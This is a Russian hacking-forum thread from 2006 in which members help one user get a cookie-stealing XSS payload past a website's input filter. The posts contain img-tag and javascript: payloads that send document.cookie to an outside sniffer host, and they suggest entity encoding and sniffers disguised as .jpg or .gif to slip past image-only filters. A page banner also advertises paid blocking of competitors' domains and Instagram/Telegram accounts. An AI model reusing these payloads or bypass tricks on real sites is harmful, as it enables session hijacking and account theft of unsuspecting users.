Форум АНТИЧАТ - Обойти фильтрацию!

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Обойти фильтрацию!

Опции темы

Поиск в этой теме

Опции просмотра

Обойти фильтрацию!

31.01.2006, 17:51

Utochka

Постоянный

Регистрация: 21.12.2005

Сообщений: 620

Провел на форуме:
1867718

Репутация: 268

Обойти фильтрацию!

Подскажите как обойти следующую фильтрацию:

До фильтрации:
<img src='http://store-room.h15.ru/sniff/sniff.php?'+document.cookie></img>

или
<img src='http://store-room.h15.ru/sniff/sniff.php?'+document.cookie></img>

После фильтрации:

<img src=/'http://store-room.h15.ru/sniff/sniff.php?/'+document.cookie></img>

Как бы это обойти?

31.01.2006, 19:18

max_pain89

Постоянный

Регистрация: 11.12.2004

Сообщений: 592

Провел на форуме:
2260903

Репутация: 345

мдя.... имхо тебе этот код ничего не даст. Надо чтобы текст интерпритировался браузером как ЯваКод. А тут просто адрес. И на снифф тебе придет ИП, реферер, а вместо кук document.cookie

31.01.2006, 19:43

Electro

Участник форума

Регистрация: 23.10.2005

Сообщений: 276

Провел на форуме:
1095453

Репутация: 113

Отправить сообщение для Electro с помощью ICQ

Цитата:

Сообщение от NeX

Подскажите как обойти следующую фильтрацию?

Мдя....эт точно!

Сниффер возвращает браузеру прозрачный GIF-файл размером 1x1 px. Это позволяет вызывать сниффер как непосредственно по ссылке в теге <a>, так и в качестве src тега <img>. Сам сниффер имеет расширение .jpg, что позволяет использовать его в обход фильтров, пропускающих только адреса картинок. А у тебя что??

Цитата:

расширения php. Так не получется или я что то не так понял...щас не могу думать голова забита (

31.01.2006, 21:39

pch

Познающий

Регистрация: 22.10.2005

Сообщений: 37

Провел на форуме:
520745

Репутация: 141

Попробуй

Код:

<img  src=javascript:aa=new&#x20;Image();aa.src=&quot;http://store-room.h15.ru/sniff/sniff.php?&quot;+document.cookie;>

01.02.2006, 14:39

Utochka

Постоянный

Регистрация: 21.12.2005

Сообщений: 620

Провел на форуме:
1867718

Репутация: 268

Цитата:

Сообщение от pch

Попробуй

Код:

<img  src=javascript:aa=new&#x20;Image();aa.src=&quot;http://store-room.h15.ru/sniff/sniff.php?&quot;+document.cookie;>

че то не сработало =( Дай свою асю, поговорить надо.

01.02.2006, 14:49

Xxor

Познающий

Регистрация: 24.01.2006

Сообщений: 33

Провел на форуме:
413899

Репутация: 10

Отправить сообщение для Xxor с помощью ICQ

Юзай античатовский снифер он с расшырением .gif должно пропустить

02.02.2006, 11:33

Utochka

Постоянный

Регистрация: 21.12.2005

Сообщений: 620

Провел на форуме:
1867718

Репутация: 268

Короче теперь такая трабла, вроде обошел фильтрацию вот этим:

<img src=javascript:aa=new Image();aa.src="ht tp://store-room.h15.ru/sniff/sniff.php?"+document.cookie;>

но он не хочет выполняться =( куки не приходят =(. Также пробовал с античатовским снифером ни хрена!

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Подделка IP	Ekstazi	Уязвимости	6	11.10.2006 21:10
кто знает.....помогите обойти....	дым	Болталка	10	12.05.2005 14:42
Как обойти сканер со значком '	Thief	Форумы	2	21.04.2005 12:07
Как обойти вставку моего сообщения в скрипт? (в блоге)	Telepuz	Уязвимости	1	18.04.2005 17:12
Как обойти фильтрацию по "маске"? (На примере форума http://www.securitylab.ru/forum)	boffin	Форумы	7	03.04.2005 15:39

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход